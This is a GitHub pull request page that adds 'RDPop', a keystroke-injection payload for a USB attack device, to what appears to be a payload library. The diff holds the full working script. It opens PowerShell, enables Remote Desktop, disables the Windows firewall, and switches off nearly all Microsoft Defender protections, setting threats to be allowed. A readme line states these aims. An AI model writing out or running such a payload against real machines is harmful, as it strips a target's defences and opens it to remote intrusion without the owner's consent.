Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

new payload-RDPop #234

Open
wants to merge 7 commits into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
24 changes: 24 additions & 0 deletions payloads/library/general/rdpop/payload.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
REM title RDPop
REM description removes restrictions and enables rdp, if given admin privileges
REM author C08W38101
REM target windows 10
DEFAULT_DELAY 500
GUI r
STRING powershell
ENTER
STRINGLN Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
STRINGLN Set-NetFirewallProfile -Enabled False
STRINGLN Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue
STRINGLN Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue
STRINGLN Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue
STRINGLN Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue
STRINGLN Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue
STRINGLN Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue
STRINGLN Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue
STRINGLN Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue
STRINGLN Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue
STRINGLN Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue
STRINGLN Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue
STRINGLN Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue
STRINGLN Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue
CTRL W
1 change: 1 addition & 0 deletions payloads/library/general/rdpop/placeholder
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@

1 change: 1 addition & 0 deletions payloads/library/general/rdpop/readme.md
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
a payload I made without owning any gear, it enables rdp, disables firewall, and disables defender <sub>cob</sub><sup>web</sup>